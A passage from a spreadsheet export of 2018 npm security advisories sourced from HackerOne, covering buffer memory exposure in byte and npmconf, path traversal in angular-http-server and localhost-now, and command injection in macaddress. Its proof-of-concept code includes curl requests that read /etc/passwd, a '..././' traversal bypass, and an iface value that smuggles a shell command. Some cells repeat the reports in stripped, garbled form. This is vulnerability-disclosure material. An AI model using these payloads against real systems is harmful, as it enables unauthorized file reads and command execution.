    <t xml:space="preserve">report memory exposure vulnerbaility byte allows extract process memory using Buffers cases.  Module  module name  byte version  1.4.0 npm page  https //www.npmjs.com/package/byte  Module Description   Input Buffer Output Buffer, just Java ByteBuffer.   Module Stats  705 downloads last day 3 836 downloads last week 14 813 downloads last month  Vulnerability  Vulnerability Description  byte allocates uninitialized buffers versions, even ones zero full new Buffer() default, uses .allocUnsafe(). provides API writing data API reading data buffer, internal buffer not zero filled API reading does not validate memory read ever initialized.  don"t think corresponds behavior  Java ByteBuffer â€” one zero filled afaik.  Steps Reproduce  var ByteBuffer = require("byte"); (let k = 0; k &lt; 1e4; k++) {   var bb = new ByteBuffer();   (let = 0; &lt; 180; i++) {     bb.putString("ok");   }   const s = bb.getString(1000);   (s.includes(" {")) {     console.log(s);     console.log("Finished attempt  " + k);     break;   } } var ByteBuffer = require("byte"); (let k = 0; k &lt; 1e4; k++) {   var bb = ByteBuffer.allocate(50);   const twos = Buffer.alloc(10, 2);   (let = 0; &lt; 7; i++) bb.put(twos, 10);   const s = bb.get(0, 100);   (s.includes(" {")) {     console.log(s.toString("utf 8"));     console.log("Finished attempt  " + k);     break;   } }  Patch  Replace Buffer(num) Buffer.allocUnsafe(num) usage Buffer.alloc(num) use polyfill, e.g. safer buffer buffer alloc.  Supporting Material/References    OS  Arch Linux current 9.9.0 npm 5.8.0   Wrap   contacted maintainer let know  N opened issue related repository  N   Impact  Read process memory containing sensitive information. </t>
  </si>
  <si>
    <t>[angular-http-server] Server Directory Traversal</t>
  </si>
  <si>
    <t>/advisories/656</t>
  </si>
  <si>
    <t>2018-05-16T17:51:22.115+00:00</t>
  </si>
  <si>
    <t>angular-http-server</t>
  </si>
  <si>
    <t>https://www.npmjs.com/angular-http-server</t>
  </si>
  <si>
    <t>&lt;=1.4.3</t>
  </si>
  <si>
    <t>&gt;=1.4.4</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/330349.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to report a Server Directory Traversal vulnerability in angular-http-server.&lt;br&gt;
It allows reading local files on the target server.&lt;/p&gt;
&lt;h1 id="module"&gt;Module&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;module name:&lt;/strong&gt; angular-http-server&lt;br&gt;
&lt;strong&gt;version:&lt;/strong&gt; 1.4.3&lt;br&gt;
&lt;strong&gt;npm page:&lt;/strong&gt; &lt;code&gt;https://www.npmjs.com/package/angular-http-server&lt;/code&gt;&lt;/p&gt;
&lt;h2 id="module-description"&gt;Module Description&lt;/h2&gt;
&lt;p&gt;A very simple application server designed for Single Page App (SPA) developers.&lt;/p&gt;
&lt;p&gt;It returns a file to the browser if it exists (ex. your-icon.png, index.html) and if can&amp;#39;t find a file that matches a given URL it re-directs you to index.html rather than giving a 404 error. The only time it will error out is if it can&amp;#39;t locate the index.html file.&lt;/p&gt;
&lt;p&gt;Originally designed for my Angular work, this server will work with any Single Page App (SPA) framework that uses a router to change the URL (React, Vue JS, Elm,...).&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Install the module:&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;code&gt;$ npm i angular-http-server&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Create the index file:&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;code&gt;$ echo &amp;quot;hi&amp;quot; &amp;gt; index.html&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Start the server:&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;code&gt;$ ./node_modules/angular-http-server/angular-http-server.js -p 6060&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Using the below request to access the file &lt;code&gt;/etc/passwd&lt;/code&gt; on the target server:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ curl --path-as-is &amp;#39;http://127.0.0.1:6060//etc/passwd&amp;#39;
##
# User Database
#
# Note that this file is consulted directly only when the system is running
# in single-user mode.  At other times this information is provided by
# Open Directory.
#
# See the opendirectoryd(8) man page for additional information about
# Open Directory.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
...
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;node v8.10.0&lt;/li&gt;
&lt;li&gt;npm 5.6.0&lt;/li&gt;
&lt;li&gt;curl 7.54.0&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id="wrap-up"&gt;Wrap up&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;I contacted the maintainer to let them know: [N] &lt;/li&gt;
&lt;li&gt;I opened an issue in the related repository: [N]&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;It allows reading local files on the target server&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-03-27T13:21:46.953Z</t>
  </si>
  <si>
    <t>2018-04-26T05:42:34.174Z</t>
  </si>
  <si>
    <t>It allows reading local files on the target server</t>
  </si>
  <si>
    <t xml:space="preserve">report Server Directory Traversal vulnerability angular http server. allows reading local files target server.  Module  module name  angular http server version  1.4.3 npm page  https //www.npmjs.com/package/angular http server  Module Description  simple application server designed Single Page App (SPA) developers.  returns file browser exists (ex. icon.png, index.html) can"t find file matches given URL re directs rather giving 404 error. time will error can"t locate file.  Originally designed Angular work, server will work Single Page App (SPA) framework uses router change URL (React, Vue JS, Elm,...).  Steps Reproduce    Install module    $ npm angular http server   Create index file    $ echo Â« Â»hiÂ« Â»     Start server    $ ./node_modules/angular http server/angular http  p 6060   Using below request access file /etc/passwd target server   $ curl   path "http //127.0.0.1 6060//etc/passwd"  ## # User Database # # Note file consulted directly when system running # single user mode.  times information provided # Open Directory. # # opendirectoryd(8) man page additional information # Open Directory. ## nobody *  2  2 Unprivileged User /var/empty /usr/bin/false root * 0 0 System Administrator /var/root /bin/sh ...  Supporting Material/References    node v8.10.0 npm 5.6.0 curl 7.54.0   Wrap   contacted maintainer let know  [N]  opened issue related repository  [N]   Impact  allows reading local files target server </t>
  </si>
  <si>
    <t>allows reading local files target server</t>
  </si>
  <si>
    <t xml:space="preserve">Bypass to defective fix of Path Traversal </t>
  </si>
  <si>
    <t>/advisories/655</t>
  </si>
  <si>
    <t>2018-05-16T17:48:38.869+00:00</t>
  </si>
  <si>
    <t>localhost-now</t>
  </si>
  <si>
    <t>https://www.npmjs.com/localhost-now</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/329837.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to report a Path Traversal vulnerability in localhost-now. It allows to read arbitrary files on the server. This is a bypass on the mitigation of &lt;a href="/reports/312889"&gt;#312889&lt;/a&gt; .&lt;/p&gt;
&lt;h1 id="module"&gt;Module&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;module name:&lt;/strong&gt; localhost-now&lt;br&gt;
&lt;strong&gt;version:&lt;/strong&gt; 1.0.2&lt;br&gt;
&lt;strong&gt;npm page:&lt;/strong&gt; &lt;code&gt;https://www.npmjs.com/package/localhost-now&lt;/code&gt;&lt;/p&gt;
&lt;h2 id="module-description"&gt;Module Description&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Am I the only one who is lazy to install Apache just for testing some HTML or JavaScript code (like XHR) ?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="module-stats"&gt;Module Stats&lt;/h2&gt;
&lt;p&gt;[13] downloads in the last week&lt;/p&gt;
&lt;h1 id="vulnerability"&gt;Vulnerability&lt;/h1&gt;
&lt;h2 id="vulnerability-description"&gt;Vulnerability Description&lt;/h2&gt;
&lt;p&gt;A path traversal attack aims to access files and directories that are stored outside the web root folder. &lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Install localhost-now&lt;/li&gt;
&lt;li&gt;Run localhost-now on directory
&lt;code&gt;
ec2-user@kali:~$ localhost 5432
Web Server started on localhost:5432
&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Execute the curl command 
&lt;code&gt;
$ curl -v --path-as-is &amp;quot;http://IP:5432/..././..././..././..././..././..././..././..././..././..././etc/passwd&amp;quot;
root:x:0:0:root:/root:/usr/bin/fish
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The problem resides on the line &lt;a href="/redirect?signature=91b15a7996429237db3885978c55fa40f61aa34f&amp;amp;url=https%3A%2F%2Fgithub.com%2FDCKT%2Flocalhost-now%2Fblob%2Fmaster%2Flib%2Fapp.js%23L17" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;17&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt; as the code just delete all the &amp;#39;../&amp;#39; strings , allowing a payload like &amp;quot;..././&amp;quot; to be transformed back in &amp;quot;../&amp;quot; .&lt;/p&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;OS version :Linux kali 4.13.0&lt;/li&gt;
&lt;li&gt;NodeJS version : v8.10.0&lt;/li&gt;
&lt;li&gt;NPM version : 5.6.0&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id="wrap-up"&gt;Wrap up&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;I contacted the maintainer to let them know: No&lt;/li&gt;
&lt;li&gt;I opened an issue in the related repository: No&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;The attacker can read remotely all files on the server.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-03-25T23:16:51.194Z</t>
  </si>
  <si>
    <t>2018-05-11T15:45:42.422Z</t>
  </si>
  <si>
    <t xml:space="preserve">A path traversal attack aims to access files and directories that are stored outside the web root folder. </t>
  </si>
  <si>
    <t>The attacker can read remotely all files on the server.</t>
  </si>
  <si>
    <t xml:space="preserve">report Path Traversal vulnerability localhost now. allows read arbitrary files server. bypass mitigation #312889 .  Module  module name  localhost version  1.0.2 npm page  https //www.npmjs.com/package/localhost  Module Description   one lazy install Apache just testing HTML JavaScript code (like XHR) ?   Module Stats  [13] downloads last week  Vulnerability  Vulnerability Description  path traversal attack aims access files directories stored outside web root folder.   Steps Reproduce    Install localhost Run localhost directory  ec2 user@kali ~$ localhost 5432 Web Server started localhost 5432   Execute curl command   $ curl  v   path Â« Â»http //IP 5432/..././..././..././..././..././..././..././..././..././..././etc/passwdÂ« Â» root x 0 0 root /root /usr/bin/fish daemon x 1 1 daemon /usr/sbin /usr/sbin/nologin bin x 2 2 bin /bin /usr/sbin/nologin ...     problem resides line 17 code just delete "../" strings , allowing payload Â« Â»..././Â« Â» transformed back Â« Â»../Â« Â» .  Supporting Material/References    OS version  Linux kali 4.13.0 NodeJS version   v8.10.0 NPM version   5.6.0   Wrap   contacted maintainer let know  No opened issue related repository  No   Impact  attacker read remotely files server. </t>
  </si>
  <si>
    <t>attacker read remotely files server.</t>
  </si>
  <si>
    <t>`macaddress` concatenates unsanitized input into exec() command</t>
  </si>
  <si>
    <t>/advisories/654</t>
  </si>
  <si>
    <t>2018-05-16T17:40:42.967+00:00</t>
  </si>
  <si>
    <t>macaddress</t>
  </si>
  <si>
    <t>https://www.npmjs.com/macaddress</t>
  </si>
  <si>
    <t>&lt;= 0.2.8</t>
  </si>
  <si>
    <t>&gt;= 0.2.9</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/319467.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;blockquote&gt;
&lt;p&gt;NOTE! Thanks for submitting a report! Please replace &lt;em&gt;all&lt;/em&gt; the [square] sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to triage and respond quickly, so be sure to take your time filling out the report!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I would like to report code injection in &lt;code&gt;macaddress&lt;/code&gt;&lt;br&gt;
It allows to inject arbitrary shell commands if the user input can influence the &lt;code&gt;iface&lt;/code&gt; argument.&lt;/p&gt;
&lt;h1 id="module"&gt;Module&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;module name:&lt;/strong&gt; macaddress&lt;br&gt;
&lt;strong&gt;version:&lt;/strong&gt; 0.2.8&lt;br&gt;
&lt;strong&gt;npm page:&lt;/strong&gt; &lt;code&gt;https://www.npmjs.com/package/macaddress&lt;/code&gt;&lt;/p&gt;
&lt;h2 id="module-description"&gt;Module Description&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Retrieve MAC addresses in Linux, OS X, and Windows.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="module-stats"&gt;Module Stats&lt;/h2&gt;
&lt;p&gt;81 238 downloads in the last day&lt;br&gt;
1 632 083 downloads in the last week&lt;br&gt;
7 031 342 downloads in the last month&lt;/p&gt;
&lt;p&gt;~84376104 estimated downloads per year [JUST FOR REFERENCE,  ~DOWNLOADS PER MONTH*12]&lt;/p&gt;
&lt;h1 id="vulnerability"&gt;Vulnerability&lt;/h1&gt;
&lt;h2 id="vulnerability-description"&gt;Vulnerability Description&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;(async)  .one(iface, callback) â†’ string&lt;/code&gt; API does not escape or sanitize &lt;code&gt;iface&lt;/code&gt; argument, and concatenates it to a shell command, passing it to &lt;code&gt;exec&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Exact lines:&lt;/p&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;lib/linux.js:4:    exec(&amp;quot;cat /sys/class/net/&amp;quot; + iface + &amp;quot;/address&amp;quot;, function (err, out) {
lib/macosx.js:4:    exec(&amp;quot;networksetup -getmacaddress &amp;quot; + iface, function (err, out) {
lib/unix.js:4:    exec(&amp;quot;ifconfig &amp;quot; + iface, function (err, out) {
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;p&gt;For Linux, use the following example:&lt;/p&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;let&lt;/span&gt; &lt;span class="nx"&gt;iface&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;../../../etc/passwd; touch /tmp/poof; echo &amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;macaddress&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;one&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;iface&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;mac&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Mac address for this host: %s&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;mac&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;  
&lt;span class="p"&gt;});&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Observe &lt;code&gt;/etc/passwd&lt;/code&gt; printed into the console, &lt;code&gt;/tmp/poof&lt;/code&gt; file created.&lt;/p&gt;
&lt;p&gt;For other OS, the testcase is similar.&lt;/p&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;State all technical information about the stack where the vulnerability was found&lt;/p&gt;
&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Arch Linux Current&lt;/li&gt;
&lt;li&gt;Node.js 9.5.0&lt;/li&gt;
&lt;li&gt;npm 5.6.0&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id="wrap-up"&gt;Wrap up&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;I contacted the maintainer to let him know: N&lt;/li&gt;
&lt;li&gt;I opened an issue in the related repository: N&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;Execute arbitrary shell commands if that parameter is user-controlled.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-02-25T05:29:40.739Z</t>
  </si>
  <si>
    <t>2018-05-11T20:14:35.387Z</t>
  </si>
  <si>
    <t>(async)  .one(iface, callback) â†’ string API does not escape or sanitize iface argument, and concatenates it to a shell command, passing it to exec.</t>
  </si>
  <si>
    <t>Execute arbitrary shell commands if that parameter is user-controlled.</t>
  </si>
  <si>
    <t xml:space="preserve"> NOTE  Thanks submitting report  Please replace [square] sections below pertinent details. Remember, detail provide, easier us triage respond quickly, so sure time filling report    report code injection macaddress allows inject arbitrary shell commands user input influence iface argument.  Module  module name  macaddress version  0.2.8 npm page  https //www.npmjs.com/package/macaddress  Module Description   Retrieve MAC addresses Linux, OS X, Windows.   Module Stats  81 238 downloads last day 1 632 083 downloads last week 7 031 342 downloads last month  ~84376104 estimated downloads per year [JUST REFERENCE,  ~DOWNLOADS PER MONTH*12]  Vulnerability  Vulnerability Description  (async)  .one(iface, callback) â†’ string API does not escape sanitize iface argument, concatenates shell command, passing exec.  Exact lines  lib/linux.js 4     exec(Â« Â»cat /sys/class/net/Â« Â» + iface + Â« Â»/addressÂ« Â», function (err, out) { lib/macosx.js 4     exec(Â« Â»networksetup  getmacaddress Â« Â» + iface, function (err, out) { lib/unix.js 4     exec(Â« Â»ifconfig Â« Â» + iface, function (err, out) {  Steps Reproduce   Linux, use following example  let iface = "../../../etc/passwd; touch /tmp/poof; echo "; require("macaddress").one(iface, function (err, mac) {   console.log(Â« Â»Mac address host  %sÂ« Â», mac);   });  Observe /etc/passwd printed console, /tmp/poof file created.  OS, testcase similar.  Supporting Material/References    State technical information stack vulnerability found    Arch Linux Current 9.5.0 npm 5.6.0   Wrap   contacted maintainer let know  N opened issue related repository  N   Impact  Execute arbitrary shell commands parameter user controlled. </t>
  </si>
  <si>
    <t>Execute arbitrary shell commands parameter user-controlled.</t>
  </si>
  <si>
    <t>`npmconf` (and `npm` js api) allocate and write to disk uninitialized memory content when a typed number is passed as input on Node.js 4.x</t>
  </si>
  <si>
    <t>/advisories/653</t>
  </si>
  <si>
    <t>2018-05-16T17:35:54.427+00:00</t>
  </si>
  <si>
    <t>npmconf</t>
  </si>
  <si>
    <t>https://www.npmjs.com/npmconf</t>
  </si>
  <si>
    <t>&lt;=2.1.2</t>
  </si>
  <si>
    <t>&gt;=2.1.3</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/320269.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to report a Buffer allocation issue in &lt;code&gt;npmconf&lt;/code&gt; (and &lt;code&gt;npm&lt;/code&gt; package js api).&lt;br&gt;
It allows to extract sensitive content from uninitialized memory by passing typed input to &lt;code&gt;setCredentialsByURI&lt;/code&gt;, limited to Node.js 4.x and below.&lt;/p&gt;
&lt;h1 id="module"&gt;Module&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;module name:&lt;/strong&gt; &lt;code&gt;npmconf&lt;/code&gt;&lt;br&gt;
&lt;strong&gt;version:&lt;/strong&gt; 2.1.2&lt;br&gt;
&lt;strong&gt;npm page:&lt;/strong&gt; &lt;code&gt;https://www.npmjs.com/package/npmconf&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;module name:&lt;/strong&gt; &lt;code&gt;npm&lt;/code&gt;&lt;br&gt;
&lt;strong&gt;version:&lt;/strong&gt; 5.6.0&lt;br&gt;
&lt;strong&gt;npm page:&lt;/strong&gt; &lt;code&gt;https://www.npmjs.com/package/npm&lt;/code&gt;&lt;/p&gt;
&lt;h2 id="module-description"&gt;Module Description&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;The config thing npm uses&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="module-stats"&gt;Module Stats&lt;/h2&gt;
&lt;h3 id="npmconf"&gt;npmconf&lt;/h3&gt;
&lt;p&gt;40 292 downloads in the last day&lt;br&gt;
219 837 downloads in the last week&lt;br&gt;
897 947 downloads in the last month&lt;/p&gt;
&lt;p&gt;~1 0775 364 estimated downloads per year&lt;/p&gt;
&lt;p&gt;&lt;code&gt;npmconf&lt;/code&gt; is deprecated, but doesn&amp;#39;t mention security issues and is still widely used, and the usage seems to &lt;em&gt;increase&lt;/em&gt; over time.&lt;/p&gt;
&lt;h3 id="npm"&gt;npm&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;npm&lt;/code&gt; download stats are not representive here, as it&amp;#39;s mainly used as a CLI, not as JS api, but here they are (e.g. for comparison with &lt;code&gt;npmconf&lt;/code&gt;):&lt;/p&gt;
&lt;p&gt;141 545 downloads in the last day&lt;br&gt;
1 067 194 downloads in the last week&lt;br&gt;
3 701 192 downloads in the last month&lt;/p&gt;
&lt;p&gt;~44 414 304 estimated downloads per year&lt;/p&gt;
&lt;h1 id="vulnerability"&gt;Vulnerability&lt;/h1&gt;
&lt;h2 id="vulnerability-description"&gt;Vulnerability Description&lt;/h2&gt;
&lt;p&gt;When a number is passed to the &lt;code&gt;password&lt;/code&gt; property of &lt;code&gt;config.setCredentialsByURI&lt;/code&gt;, &lt;code&gt;npmconf&lt;/code&gt;/&lt;code&gt;npm&lt;/code&gt; allocate uninitialized Buffer instances during conversion to base64 (on Node.js 4.x) due to missing type checks before passing user input to the &lt;code&gt;new Buffer()&lt;/code&gt; constructor.&lt;/p&gt;
&lt;p&gt;Those Buffer instances could (and most likely will) contain sensitive information, see &lt;a href="/redirect?signature=2655872a71ab492935b28740e3de41cc1df52173&amp;amp;url=https%3A%2F%2Fgithub.com%2FChALkeR%2Fnotes%2Fblob%2Fmaster%2FBuffer-knows-everything.md" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;Buffer-knows-everything.md&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Node.js 4.x is stated as supported in &lt;code&gt;npm&lt;/code&gt;.&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;p&gt;Use Node.js 4.x LTS or below.&lt;/p&gt;
&lt;h3 id="npmconf"&gt;npmconf&lt;/h3&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;URI&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;https://registry.example.com:8661/&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;npmconf&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;load&lt;/span&gt;&lt;span class="p"&gt;({},&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;conf&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;conf&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;setCredentialsByURI&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;URI&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="na"&gt;username&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;foo&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="na"&gt;email&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;boo@example.com&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="na"&gt;password&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;200&lt;/span&gt;&lt;span class="p"&gt;});&lt;/span&gt;
  &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;conf&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;getCredentialsByURI&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;URI&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt; &lt;span class="c1"&gt;// This just outputs the setting&lt;/span&gt;
  &lt;span class="c1"&gt;// conf.save(&amp;#39;user&amp;#39;, function() {}) // Warning: writes base64-encoded uninitialized buffer .npmrc&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;h3 id="npm"&gt;npm&lt;/h3&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;URI&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;https://registry.example.com:8661/&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;npm&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;load&lt;/span&gt;&lt;span class="p"&gt;({},&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;npm&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;npm&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;config&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;setCredentialsByURI&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;URI&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="na"&gt;username&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;foo&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="na"&gt;email&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;boo@example.com&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="na"&gt;password&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;200&lt;/span&gt;&lt;span class="p"&gt;});&lt;/span&gt;
  &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;npm&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;config&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;getCredentialsByURI&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;URI&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt; &lt;span class="c1"&gt;// This just outputs the setting&lt;/span&gt;
  &lt;span class="c1"&gt;// npm.config.save(&amp;#39;user&amp;#39;, function() {}) // Warning: writes base64-encoded uninitialized buffer .npmrc&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Arch Linux&lt;/li&gt;
&lt;li&gt;Node.js v4.8.7 (latest in 4.x LTS branch)&lt;/li&gt;
&lt;li&gt;npm 5.6.0&lt;/li&gt;
&lt;/ul&gt;
